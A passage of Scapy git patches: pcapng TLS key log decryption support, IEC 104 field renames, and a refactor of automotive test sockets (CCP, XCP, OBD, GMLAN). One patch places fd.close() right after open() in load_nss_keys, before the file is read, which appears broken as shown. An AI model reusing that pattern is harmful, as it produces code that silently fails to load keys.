warning("PcapNg: DSB is too small %d!", len(block)) + raise EOFError + + # Compute the secrets length including the padding + padded_secrets_length = secrets_length + (4 - secrets_length % 4) + if len(block) < padded_secrets_length: + warning("PcapNg: invalid DSB secrets length!") + raise EOFError + + # Extract secrets data and options + secrets_data = block[:padded_secrets_length][:secrets_length] + if block[padded_secrets_length:]: + warning("PcapNg: DSB options are not supported!") + + # TLS Key Log + if secrets_type == 0x544c534b: + if getattr(conf, "tls_nss_keys", False) is False: + warning("PcapNg: TLS Key Log available, but " + "the TLS layer is not loaded! Scapy won't be able " + "to decrypt the packets.") + else: + from scapy.layers.tls.session import load_nss_keys + + # Write Key Log to a file and parse it + filename = get_temp_file() + with open(filename, "wb") as fd: + fd.write(secrets_data) + fd.close() + + keys = load_nss_keys(filename) + if not keys: + warning("PcapNg: invalid TLS Key Log in DSB!") + else: + # Note: these attributes are only available when the TLS + # layer is loaded. + conf.tls_nss_keys = keys # type: ignore + conf.tls_session_enable = True # type: ignore + else: + warning("PcapNg: Unknown DSB secrets type (0x%x)!", secrets_type) + class PcapNgReader(RawPcapNgReader, PcapReader, _SuperSocket): diff --git a/test/tls.uts b/test/tls.uts index 9f7cbed19f0..7d50f0221b4 100644 --- a/test/tls.uts +++ b/test/tls.uts @@ -1569,6 +1569,10 @@ assert [type(x) for x in pkt.msg] == [TLSServerHello, TLSCertificate, TLSCertifi ####################### Decrypt packets from a pcap ########################## ############################################################################### ++ Decrypt packets from a pcap + += pcap file & external TLS Key Log file + bck_conf = conf conf.tls_session_enable = True conf.tls_nss_filename = scapy_path("doc/notebooks/tls/raw_data/tls_nss_example.keys.txt") @@ -1578,3 +1582,19 @@ assert b"GET /secret.txt HTTP/1.0\n" in packets[11].msg[0].data assert b"z2|gxarIKOxt,G1d>.Q2MzGY[k@" in packets[13].msg[0].data conf = bck_conf + += pcapng file with a Decryption Secrets Block +~ tshark linux + +bck_conf = conf + +key_log_path = scapy_path("doc/notebooks/tls/raw_data/tls_nss_example.keys.txt") +pcap_path = scapy_path("doc/notebooks/tls/raw_data/tls_nss_example.pcap") +pcapng_path = get_temp_file() +os.system("editcap --inject-secrets tls,%s %s %s" % (key_log_path, pcap_path, pcapng_path)) + +packets = rdpcap(pcapng_path) +assert b"GET /secret.txt HTTP/1.0\n" in packets[11].msg[0].data +assert b"z2|gxarIKOxt,G1d>.Q2MzGY[k@" in packets[13].msg[0].data + +conf = bck_conf From de4fa7e102727c178ab770f77d8bc9932200dc14 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sat, 16 Oct 2021 20:59:26 +0200 Subject: [PATCH 0676/1632] Close file descriptor Date: Sat Oct 16 20:59:26 2021 +0200 --- scapy/layers/tls/session.py | 1 + 1 file changed, 1 insertion(+) diff --git a/scapy/layers/tls/session.py b/scapy/layers/tls/session.py index 86fe290face..1006fa08c2f 100644 --- a/scapy/layers/tls/session.py +++ b/scapy/layers/tls/session.py @@ -37,6 +37,7 @@ def load_nss_keys(filename): keys = {} try: fd = open(filename) + fd.close() except FileNotFoundError: warning("Cannot open NSS Key Log: %s", filename) return {} From 2519bf1c01a5c1773c6a7b2ca569fadba4923d24 Mon Sep 17 00:00:00 2001 From: Torben Woltjen Date: Tue, 5 Oct 2021 18:22:45 +0200 Subject: [PATCH 0677/1632] Rename duplicate fields for contrib.scada.iec104 Fixes the last open checkbox of #2862 - the contrib.scada.iec104 part. There were some places where multiple information elements (thus fields) were concatenated, e.g. the fields of the `IEC104_IE_SIQ` and the `IEC104_IE_CP56TIME2A` classes. The first one is a SIQ (single point information with quality descriptor) and the second one is a CP56Time2a (basically a timestamp), so the concatenated result could be called a `single-point information with quality descriptor and with time tag cp56time2a`. Both of which contain a field called `iv` leading to the (in this case very correct) warning as this results in multiple fields in a packet to have the same name. In short: There are multiple classes / data types in the standard that include a time tag cp56time2a, thus leading to this warning in many places. So there were two possibilites: Changing all of the classes that use `iv` as their field name or simply rename this field in the cp56time2a time tag field. I chose the latter as this has a smaller impact on existing code. Obviously, code addressing exactly that field will now have to be adjusted accordingly. However, I'm not sure how and if the old code worked anyways as they had exactly the name. So I guess, this change is not too destructive. The same applies for the `reserved` field in the `IEC104_IE_QDP` class that gets concatenated to a number of classes - though, in this case probably noone ever used / addressed the `reserved` field anyways. This MR gets rid of all the syntax warnings (and my code using this part of scapy continues to work - however, I don't use any of the types that make use of these fields). It tries to introduce as few breaking changes as possible (after a thorough investigation, I found that only two of the field names needed to be changed, even though there were dozens of warnings). Would be great if this MR would be merged (or if there is some feedback for changes first, I'm happy to hear about it!), because currently using the `scada.iec104` protocol in scapy spams the output with lots of syntax warnings and this reduces them to zero. --- As a workaround in the meantime, I currently suppress the warnings until this is fixed: ```python # ignore SyntaxWarnings from iec104 modules as they spam the complete log and it's not under our control anyways import warnings warnings.simplefilter('ignore', SyntaxWarning) import scapy.contrib.scada.iec104 as iec104 warnings.simplefilter('default', SyntaxWarning) # reset to default behaviour to not miss possible future helpful SyntaxWarnings ``` --- scapy/contrib/scada/iec104/iec104_information_elements.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/scada/iec104/iec104_information_elements.py b/scapy/contrib/scada/iec104/iec104_information_elements.py index 39327ad340f..e8249997527 100644 --- a/scapy/contrib/scada/iec104/iec104_information_elements.py +++ b/scapy/contrib/scada/iec104/iec104_information_elements.py @@ -219,7 +219,7 @@ class IEC104_IE_QDP(IEC104_IE_CommonQualityFlags): # blocked BitEnumField('ei', 0, 1, IEC104_IE_CommonQualityFlags.EI_FLAGS), # blocked - BitField('reserved', 0, 3) + BitField('reserved_qdp', 0, 3) ] @@ -605,7 +605,7 @@ class IEC104_IE_CP56TIME2A(IEC104_IE_CommonQualityFlags): informantion_element_fields = [ LEShortField('sec_milli', 0), - BitEnumField('iv', 0, 1, IEC104_IE_CommonQualityFlags.IV_FLAGS), + BitEnumField('iv_time', 0, 1, IEC104_IE_CommonQualityFlags.IV_FLAGS), BitEnumField('gen', 0, 1, GEN_FLAGS), # only valid in monitor direction ToDo: special treatment needed? BitField('minutes', 0, 6), From 7cae3fb65e5cf444e8dc1d99720506ed410cec9f Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 19 Oct 2021 09:59:33 +0200 Subject: [PATCH 0678/1632] Add TestSocket as individual file (#3379) * Add TestSocket as individual file and remove the execution of interface_mockup from various unit tests * add contrib module description * add import to isotp_soft_socket.uts * add testsocket unit test * increase timeouts * add print * execute testsocket tests first * add debug code * add further test * simplify test * Bugfix in sendrecv * debug CAN layer unit test * try fix of can.uts * cleanup * increase timeouts * increase timeouts * cleanup * fix test * moved testsocket into /test/ * fix tox * add __init__.py * fix gmlanutils * applied feedback * fix testsocket * add timeout to join() --- .config/mypy/mypy_enabled.txt | 3 + test/__init__.py | 0 test/contrib/automotive/ccp.uts | 108 +++++++++--------- test/contrib/automotive/ecu_am.uts | 12 +- test/contrib/automotive/gm/gmlanutils.uts | 13 ++- test/contrib/automotive/gm/scanner.uts | 11 +- test/contrib/automotive/interface_mockup.py | 93 ---------------- test/contrib/automotive/obd/scanner.uts | 20 +--- test/contrib/automotive/testsocket.uts | 109 ++++++++++++++++++ test/contrib/automotive/uds_utils.uts | 2 +- test/contrib/automotive/xcp/xcp_comm.uts | 47 +++----- test/contrib/isotp_soft_socket.uts | 4 + test/scapy/layers/can.uts | 8 +- test/testsocket.py | 117 ++++++++++++++++++++ test/tools/xcpscanner.uts | 32 ++---- 15 files changed, 345 insertions(+), 234 deletions(-) create mode 100644 test/__init__.py create mode 100644 test/contrib/automotive/testsocket.uts create mode 100644 test/testsocket.py diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 6114991ae59..107dd82d797 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -72,3 +72,6 @@ scapy/contrib/isotp/isotp_scanner.py scapy/contrib/isotp/isotp_soft_socket.py scapy/contrib/isotp/isotp_utils.py scapy/contrib/roce.py + +# TEST +test/testsocket.py \ No newline at end of file diff --git a/test/__init__.py b/test/__init__.py new file mode 100644 index 00000000000..e69de29bb2d diff --git a/test/contrib/automotive/ccp.uts b/test/contrib/automotive/ccp.uts index 1e786a9ee01..467d41c287b 100644 --- a/test/contrib/automotive/ccp.uts +++ b/test/contrib/automotive/ccp.uts @@ -5,8 +5,7 @@ = Imports -with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: - exec(f.read()) +from test.testsocket import TestSocket, cleanup_testsockets ############ ############ @@ -877,25 +876,25 @@ assert dto.ccp_reserved == b"\xff" * 3 assert dto.hashret() == cro.hashret() + Tests on a virtual CAN-Bus -~ not_pypy = CAN Socket sr1 with dto.ansers(cro) == True -with new_can_socket0() as sock1, new_can_socket0() as sock2: - sock1.basecls = CCP - started = threading.Event() - def ecu(): - pkts = sock2.sniff(count=1, timeout=1, started_callback=started.set) - if len(pkts) == 1: - cro = CRO(pkts[0].data) - assert cro.cmd == 0x22 - assert cro.data == b"\x10\x11\x12\x10\x11\x12" - sock2.send(CCP(b'\x00\x00\x07\x00\x08\x00\x00\x00\xff\x00\x53\x02\x34\x00\x20\x06')) - thread = threading.Thread(target=ecu) - thread.start() - started.wait(timeout=5) - dto = sock1.sr1(CCP(identifier=0x700)/CRO(ctr=0x53)/PROGRAM_6(data=b"\x10\x11\x12\x10\x11\x12"), timeout=1) - thread.join(timeout=5) +sock1 = TestSocket(CCP) +sock2 = TestSocket(CAN) +sock1.pair(sock2) + +def answer(pkt): + cro = CRO(pkt.data) + assert cro.cmd == 0x22 + assert cro.data == b"\x10\x11\x12\x10\x11\x12" + sock2.send(CCP(b'\x00\x00\x07\x00\x08\x00\x00\x00\xff\x00\x53\x02\x34\x00\x20\x06')) + +sniffer = AsyncSniffer(opened_socket=sock2, count=1, timeout=5, prn=answer) +sniffer.start() +dto = sock1.sr1(CCP(identifier=0x700)/CRO(ctr=0x53)/PROGRAM_6(data=b"\x10\x11\x12\x10\x11\x12"), timeout=1, verbose=False) +sniffer.join(timeout=5) +sock1.close() +sock2.close() assert dto.ctr == 83 assert dto.packet_id == 0xff @@ -906,44 +905,43 @@ assert dto.MTA0_address == 0x34002006 = CAN Socket sr1 with dto.ansers(cro) == False -with new_can_socket0() as sock1, new_can_socket0() as sock2: - sock1.basecls = CCP - started = threading.Event() - def ecu(): - pkts = sock2.sniff(count=1, timeout=1, started_callback=started.set) - if len(pkts) == 1: - cro = CRO(pkts[0].data) - assert cro.cmd == 0x22 - assert cro.data == b"\x10\x11\x12\x10\x11\x12" - sock2.send(CCP(b'\x00\x00\x07\x00\x08\x00\x00\x00\xff\x00\x55\x02\x34\x00\x20\x06')) - thread = threading.Thread(target=ecu) - thread.start() - started.wait(timeout=5) - gotTimeout = False - dto = sock1.sr1(CCP(identifier=0x700)/CRO(ctr=0x54)/PROGRAM_6(data=b"\x10\x11\x12\x10\x11\x12"), timeout=1) - print(dto) - if dto is None: - gotTimeout = True - assert gotTimeout - thread.join(timeout=5) +sock1 = TestSocket(CCP) +sock2 = TestSocket(CAN) +sock1.pair(sock2) + +def answer(pkt): + cro = CRO(pkt.data) + assert cro.cmd == 0x22 + assert cro.data == b"\x10\x11\x12\x10\x11\x12" + sock2.send(CCP(b'\x00\x00\x07\x00\x08\x00\x00\x00\xff\x00\x55\x02\x34\x00\x20\x06')) + +sniffer = AsyncSniffer(opened_socket=sock2, count=1, timeout=5, prn=answer) +sniffer.start() +dto = sock1.sr1(CCP(identifier=0x700)/CRO(ctr=0x54)/PROGRAM_6(data=b"\x10\x11\x12\x10\x11\x12"), timeout=0.1, verbose=False) +sniffer.join(timeout=5) +sock1.close() +sock2.close() +assert dto is None + = CAN Socket sr1 with error code -with new_can_socket0() as sock1, new_can_socket0() as sock2: - sock1.basecls = CCP - started = threading.Event() - def ecu(): - pkts = sock2.sniff(count=1, timeout=1, started_callback=started.set) - if len(pkts) == 1: - cro = CRO(pkts[0].data) - assert cro.cmd == 0x22 - assert cro.data == b"\x10\x11\x12\x10\x11\x12" - sock2.send(CCP(b'\x00\x00\x07\x00\x08\x00\x00\x00\xff\x01\x55\xff\xff\xff\xff\xff')) - thread = threading.Thread(target=ecu) - thread.start() - started.wait(timeout=5) - dto = sock1.sr1(CCP(identifier=0x700)/CRO(ctr=0x55)/PROGRAM_6(data=b"\x10\x11\x12\x10\x11\x12"), timeout=1) - thread.join(timeout=5) +sock1 = TestSocket(CCP) +sock2 = TestSocket(CAN) +sock1.pair(sock2) + +def answer(pkt): + cro = CRO(pkt.data) + assert cro.cmd == 0x22 + assert cro.data == b"\x10\x11\x12\x10\x11\x12" + sock2.send(CCP(b'\x00\x00\x07\x00\x08\x00\x00\x00\xff\x01\x55\xff\xff\xff\xff\xff')) + +sniffer = AsyncSniffer(opened_socket=sock2, count=1, timeout=5, prn=answer) +sniffer.start() +dto = sock1.sr1(CCP(identifier=0x700)/CRO(ctr=0x55)/PROGRAM_6(data=b"\x10\x11\x12\x10\x11\x12"), timeout=1, verbose=False) +sniffer.join(timeout=5) +sock1.close() +sock2.close() assert dto.ctr == 85 assert dto.packet_id == 0xff @@ -954,7 +952,7 @@ assert dto.MTA0_address == 0xffffffff + Cleanup -= Delete vcan interfaces += Delete TestSockets -assert cleanup_interfaces() +cleanup_testsockets() diff --git a/test/contrib/automotive/ecu_am.uts b/test/contrib/automotive/ecu_am.uts index 86d5b10e806..61f702a3418 100644 --- a/test/contrib/automotive/ecu_am.uts +++ b/test/contrib/automotive/ecu_am.uts @@ -5,9 +5,7 @@ = Imports -with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: - exec(f.read()) - +from test.testsocket import TestSocket, cleanup_testsockets ############ ############ @@ -18,8 +16,6 @@ with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: load_contrib("automotive.uds", globals_dict=globals()) load_contrib("automotive.ecu", globals_dict=globals()) -from scapy.contrib.automotive.uds_ecu_states import * - conf.contribs['EcuAnsweringMachine']['send_delay'] = 0 ecu = TestSocket(UDS) @@ -402,3 +398,9 @@ finally: assert success conf.contribs['UDS']['treat-response-pending-as-answer'] = False + ++ Cleanup + += Delete TestSockets + +cleanup_testsockets() \ No newline at end of file diff --git a/test/contrib/automotive/gm/gmlanutils.uts b/test/contrib/automotive/gm/gmlanutils.uts index f334daf08eb..932335b4287 100644 --- a/test/contrib/automotive/gm/gmlanutils.uts +++ b/test/contrib/automotive/gm/gmlanutils.uts @@ -6,8 +6,7 @@ = Imports -with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: - exec(f.read()) +from test.testsocket import TestSocket, cleanup_testsockets ############ ############ @@ -15,6 +14,7 @@ with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: = Load contribution layer +load_layer("can", globals_dict=globals()) load_contrib("automotive.gm.gmlan", globals_dict=globals()) load_contrib("automotive.gm.gmlanutils", globals_dict=globals()) @@ -76,6 +76,7 @@ assert GMLAN_RequestDownload(isotpsock, 4, timeout=1) == False ############################ Response pending = Positive, after response pending started = threading.Event() + def ecusim(): isotpsock2.sniff(count=1, timeout=2, started_callback=started.set) pending = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x78) @@ -95,6 +96,7 @@ assert res tout = 0.1 repeats = 4 started = threading.Event() + def ecusim(): isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) ack = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x78) @@ -178,6 +180,7 @@ assert res = Positive, negative response from different service interferes while pending started = threading.Event() + def ecusim(): isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) pending = GMLAN()/GMLAN_NR(requestServiceId=0x34, returnCode=0x78) @@ -1172,3 +1175,9 @@ started.wait(timeout=5) res = GMLAN_ReadMemoryByAddress(isotpsock, 0x0, 0x8, timeout=1, retry=1) == payload thread.join(timeout=5) assert res + ++ Cleanup + += Delete TestSockets + +cleanup_testsockets() diff --git a/test/contrib/automotive/gm/scanner.uts b/test/contrib/automotive/gm/scanner.uts index a627f94e9f3..94ebe8137af 100644 --- a/test/contrib/automotive/gm/scanner.uts +++ b/test/contrib/automotive/gm/scanner.uts @@ -4,10 +4,12 @@ ~ conf = Imports + import itertools +import threading +from scapy.contrib.isotp import ISOTPMessageBuilder -with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: - exec(f.read()) +from test.testsocket import TestSocket, cleanup_testsockets ############ @@ -18,7 +20,6 @@ with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: from scapy.contrib.automotive.gm.gmlan import * conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 -from scapy.contrib.automotive.gm.gmlan_ecu_states import * from scapy.contrib.automotive.gm.gmlan_scanner import * from scapy.contrib.automotive.ecu import * load_layer("can") @@ -477,6 +478,6 @@ assert "RequestOutOfRange received " in result + Cleanup -= Delete vcan interfaces += Delete TestSockets -assert cleanup_interfaces() +cleanup_testsockets() diff --git a/test/contrib/automotive/interface_mockup.py b/test/contrib/automotive/interface_mockup.py index 0fccec430cb..653b81368cf 100644 --- a/test/contrib/automotive/interface_mockup.py +++ b/test/contrib/automotive/interface_mockup.py @@ -17,11 +17,6 @@ from scapy.error import log_runtime, Scapy_Exception import scapy.modules.six as six from scapy.consts import LINUX -from scapy.automaton import ObjectPipe, select_objects -from scapy.data import MTU -from scapy.packet import Packet -from scapy.compat import Optional, Type, Tuple, Any -from scapy.supersocket import SuperSocket load_layer("can", globals_dict=globals()) conf.contribs['CAN']['swap-bytes'] = False @@ -118,11 +113,6 @@ def cleanup_interfaces(): :return: True on success """ - global open_test_sockets - for sock in open_test_sockets: - sock.close() - del sock - if LINUX and _not_pypy and _root: if 0 != subprocess.call(["ip", "link", "delete", iface0]): raise Exception("%s could not be deleted" % iface0) @@ -219,86 +209,3 @@ def exit_if_no_isotp_module(): from scapy.contrib.automotive.ecu import * # noqa: F403 log_runtime.debug("Set send delay to lower utilization on CI machines") conf.contribs['EcuAnsweringMachine']['send_delay'] = 0.004 - -# ############################################################################ -# """ Define custom SuperSocket for unit tests """ -# ############################################################################ - -open_test_sockets = list() - - -class TestSocket(ObjectPipe, object): - nonblocking_socket = False # type: bool - - def __init__(self, basecls=None): - # type: (Optional[Type[Packet]]) -> None - global open_test_sockets - super(TestSocket, self).__init__() - self.basecls = basecls - self.paired_sockets = list() # type: List[TestSocket] - self.closed = False - open_test_sockets.append(self) - - def __enter__(self): - # type: () -> TestSocket - return self - - def __exit__(self, exc_type, exc_value, traceback): - # type: (Optional[Type[BaseException]], Optional[BaseException], Optional[Any]) -> None # noqa: E501 - """Close the socket""" - self.close() - - def close(self): - self.closed = True - super(TestSocket, self).close() - - def pair(self, sock): - # type: (TestSocket) -> None - self.paired_sockets += [sock] - sock.paired_sockets += [self] - - def send(self, x): - # type: (Packet) -> int - sx = bytes(x) - for r in self.paired_sockets: - super(TestSocket, r).send(sx) - try: - x.sent_time = time.time() - except AttributeError: - pass - return len(sx) - - def recv_raw(self, x=MTU): - # type: (int) -> Tuple[Optional[Type[Packet]], Optional[bytes], Optional[float]] # noqa: E501 - """Returns a tuple containing (cls, pkt_data, time)""" - return self.basecls, \ - super(TestSocket, self).recv(), \ - time.time() - - def recv(self, x=MTU): - # type: (int) -> Optional[Packet] - if six.PY3: - return SuperSocket.recv(self, x) - else: - return SuperSocket.recv.im_func(self, x) - - def sr1(self, *args, **kargs): - # type: (Any, Any) -> Optional[Packet] - if six.PY3: - return SuperSocket.sr1(self, *args, **kargs) - else: - return SuperSocket.sr1.im_func(self, *args, **kargs) - - def sniff(self, *args, **kargs): - # type: (Any, Any) -> PacketList - if six.PY3: - return SuperSocket.sniff(self, *args, **kargs) - else: - return SuperSocket.sniff.im_func(self, *args, **kargs) - - @staticmethod - def select(sockets, remain=conf.recv_poll_rate): - # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] - sock = [s for s in sockets if isinstance(s, ObjectPipe) - and not s._closed] - return select_objects(sock, remain) diff --git a/test/contrib/automotive/obd/scanner.uts b/test/contrib/automotive/obd/scanner.uts index 7763638fa7e..f8c02037e60 100644 --- a/test/contrib/automotive/obd/scanner.uts +++ b/test/contrib/automotive/obd/scanner.uts @@ -6,26 +6,18 @@ = Imports -with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: - exec(f.read()) - -############ -############ -+ Load general modules +from test.testsocket import TestSocket, cleanup_testsockets = Load contribution layer -load_contrib("automotive.obd.obd", globals_dict=globals()) - -+ Load OBD_scan -= imports - -from scapy.contrib.automotive.obd.scanner import OBD_Scanner +load_contrib("automotive.obd.obd", globals_dict=globals()) load_contrib("automotive.obd.scanner", globals_dict=globals()) load_contrib("automotive.ecu", globals_dict=globals()) conf.contribs['EcuAnsweringMachine']['send_delay'] = 0 += Create sockets + ecu = TestSocket(OBD) tester = TestSocket(OBD) ecu.pair(tester) @@ -218,6 +210,6 @@ assert len(s.enumerators[0].results_with_negative_response) == 1 + Cleanup -= Delete vcan interfaces += Delete TestSockets -assert cleanup_interfaces() +cleanup_testsockets() diff --git a/test/contrib/automotive/testsocket.uts b/test/contrib/automotive/testsocket.uts new file mode 100644 index 00000000000..005daf99d54 --- /dev/null +++ b/test/contrib/automotive/testsocket.uts @@ -0,0 +1,109 @@ +% Regression tests for TestSocket + ++ Configuration +~ conf + += Imports + +from test.testsocket import TestSocket, cleanup_testsockets + += Create Dummy Packet + +class TestPacket(Packet): + fields_desc = [ + IntField("identifier", 0), + StrField("data", b"") + ] + def answers(self, other): + if other.__class__ != self.__class__: + return False + if self.identifier % 2: + return False + if self.identifier == (other.identifier + 1): + return True + return False + def hashret(self): + return struct.pack('I', self.identifier + (self.identifier % 2)) + + += Create Sockets + +sender = TestSocket(TestPacket) +receiver = TestSocket(TestPacket) +sender.pair(receiver) + ++ Basic tests + += Simple ping pong + +def create_answer(p): + ans = TestPacket(identifier=p.identifier + 1, data=p.data + b"_answer") + receiver.send(ans) + +t = AsyncSniffer(timeout=50, prn=create_answer, opened_socket=receiver) +t.start() + +pks = PacketList() + +for i in range(1, 2000, 2): + txp = TestPacket(identifier=i, data=b"hello"*i) + rxp = sender.sr1(txp, verbose=False, timeout=0.5) + pks.append(txp) + pks.append(rxp) + +t.stop(join=True) +convs = pks.sr() + +sender.close() +receiver.close() + +assert len(t.results) == 1000 +assert len(pks) == 2000 +assert len(convs[0]) == 1000 + += Simple ping pong with sr with packet generator 500 + +testlen = 500 + +sender = TestSocket(TestPacket) +receiver = TestSocket(TestPacket) +sender.pair(receiver) + +t = AsyncSniffer(timeout=10, prn=create_answer, opened_socket=receiver) +t.start() + +txp = TestPacket(identifier=range(1, testlen * 2, 2), data=b"test1") +rxp = sender.sr(txp, timeout=10, verbose=False, prebuild=True) +t.stop(join=True) + +print(rxp) +print(rxp[0].summary()) + +sender.close() +receiver.close() + +assert len(t.results) == testlen +assert len(rxp[0]) == testlen + += Simple ping pong with sr with generated packets + +sender = TestSocket(TestPacket) +receiver = TestSocket(TestPacket) +sender.pair(receiver) + +t = AsyncSniffer(timeout=10, prn=create_answer, opened_socket=receiver) +t.start() + +txp = [TestPacket(identifier=i, data=b"hello") for i in range(1, 2000, 2)] +rxp = sender.sr(txp, timeout=10, verbose=False) +t.stop(join=True) + +print(rxp) +assert len(t.results) == 1000 +assert len(rxp[0]) == 1000 + ++ Cleanup + += Delete TestSockets + +cleanup_testsockets() \ No newline at end of file diff --git a/test/contrib/automotive/uds_utils.uts b/test/contrib/automotive/uds_utils.uts index 644f3afebac..092300f2574 100644 --- a/test/contrib/automotive/uds_utils.uts +++ b/test/contrib/automotive/uds_utils.uts @@ -1,5 +1,5 @@ % Regression tests for uds_utils -~ needs_root not_pypy automotive_comm +~ needs_root not_pypy automotive_comm disabled + Configuration ~ conf diff --git a/test/contrib/automotive/xcp/xcp_comm.uts b/test/contrib/automotive/xcp/xcp_comm.uts index d20ddf77b14..2b933ca49e2 100644 --- a/test/contrib/automotive/xcp/xcp_comm.uts +++ b/test/contrib/automotive/xcp/xcp_comm.uts @@ -1,6 +1,4 @@ % Regression tests for the XCP using CANSockets -~ not_pypy automotive_comm -# More information at http://www.secdev.org/projects/UTscapy/ ############ ############ @@ -10,8 +8,7 @@ = Imports -with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: - exec(f.read()) +from test.testsocket import TestSocket, cleanup_testsockets = Load module @@ -19,34 +16,16 @@ load_contrib("automotive.xcp.xcp", globals_dict=globals()) = Connect -evt = threading.Event() - -def ecu(): - global evt - with new_can_socket1() as sock2: - sock2.basecls = XCPOnCAN - response = XCPOnCAN( - identifier=0x700) / CTOResponse() / ConnectPositiveResponse( - b'\x15\xC0\x08\x08\x00\x10\x10') - while True: - pkts = sock2.sniff(count=1, timeout=5, started_callback=evt.set) - if len(pkts): - if pkts[0].identifier == 0x100: - break - sock2.send(response) - -with new_can_socket1() as sock1: - sock1.basecls = XCPOnCAN - thread = threading.Thread(target=ecu) - thread.start() - evt.wait(timeout=10) - pkt = XCPOnCAN(identifier=0x700) / CTORequest() / Connect() - for x in range(10): - ans = sock1.sr1(pkt, timeout=0.5) - if ans is not None: - break - sock1.send(XCPOnCAN(identifier=0x100)) - thread.join(timeout=10) +sock1 = TestSocket(XCPOnCAN) +sock2 = TestSocket(XCPOnCAN) +sock1.pair(sock2) + +response = XCPOnCAN(identifier=0x700) / CTOResponse() / ConnectPositiveResponse(b'\x15\xC0\x08\x08\x00\x10\x10') +sniffer = AsyncSniffer(opened_socket=sock2, count=1, timeout=5, prn=lambda x: sock2.send(response)) +sniffer.start() +pkt = XCPOnCAN(identifier=0x700) / CTORequest() / Connect() +ans = sock1.sr1(pkt, timeout=0.5, verbose=False) +sniffer.join(timeout=1) assert ans.identifier == 0x700 cto_response = ans["CTOResponse"] @@ -116,7 +95,7 @@ assert not response.answers(request) + Cleanup -= Delete vcan interfaces += Delete TestSockets -assert cleanup_interfaces() +cleanup_testsockets() diff --git a/test/contrib/isotp_soft_socket.uts b/test/contrib/isotp_soft_socket.uts index 42273e0aaef..b0cbc13c90a 100644 --- a/test/contrib/isotp_soft_socket.uts +++ b/test/contrib/isotp_soft_socket.uts @@ -12,6 +12,9 @@ import scapy.modules.six as six with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: exec(f.read()) +from test.testsocket import TestSocket, cleanup_testsockets + + = Definition of utility functions # hexadecimal to bytes convenience function @@ -869,3 +872,4 @@ s = None = Delete vcan interfaces assert cleanup_interfaces() +cleanup_testsockets() diff --git a/test/scapy/layers/can.uts b/test/scapy/layers/can.uts index d2b1aeb1dd7..04e19bf68c5 100644 --- a/test/scapy/layers/can.uts +++ b/test/scapy/layers/can.uts @@ -41,13 +41,15 @@ pkt.flags == 0x4 = Read PCAP file * From https://wiki.wireshark.org/SampleCaptures?action=AttachFile&do=get&target=CANopen.pca +conf.contribs['CAN']['swap-bytes'] = False + from io import BytesIO pcap_fd = BytesIO(b'\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\xe3\x00\x00\x00\xe2\xf3mT\x93\x8c\x03\x00\t\x00\x00\x00\t\x00\x00\x00\x00\x00\x073\x01\x00\x00\x00\x00\xe2\xf3mT\xae\x8c\x03\x00\n\x00\x00\x00\n\x00\x00\x00\x00\x00\x00\x00\x02\x7f\x00\x00\x81\x00\xe2\xf3mTI\x8f\x03\x00\t\x00\x00\x00\t\x00\x00\x00\x00\x00\x07B\x01\x00\x00\x00\x00\xe2\xf3mTM\x8f\x03\x00\t\x00\x00\x00\t\x00\x00\x00\x00\x00\x07c\x01\x00\x00\x00\x00\xe2\xf3mTN\x8f\x03\x00\t\x00\x00\x00\t\x00\x00\x00\x00\x00\x07!\x01\x00\x00\x00\x00\xf8\xf3mTv\x98\x04\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x06B\x08\x7f\x00\x00@\x08\x10\x00\x00\x00\x00\x00\xf8\xf3mT\x96\x98\x04\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x05\xc2\x08\x7f\x00\x00A\x08\x10\x00\x15\x00\x00\x00\xf8\xf3mT\xd4\x98\x04\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x06B\x08\x00\x00\x00`\x00\x00\x00\x00\x00\x00\x00\xf8\xf3mT\x12\x99\x04\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x06B\x08\x00\x00\x00\x80\x00\x00\x00!\x00\x00\x08\xf8\xf3mTC\x99\x04\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x05\xc2\x08\x7f\x00\x00\x00UltraHi\xf8\xf3mTx\x99\x04\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x06B\x08\x00\x00\x00\x80\x00\x00\x00!\x00\x00\x08\xf8\xf3mT\xce\x99\x04\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x06B\x08\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00\xf8\xf3mT\xe0\x99\x04\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x06B\x08\x00\x00\x00\x80\x00\x00\x00!\x00\x00\x08\xf8\xf3mT 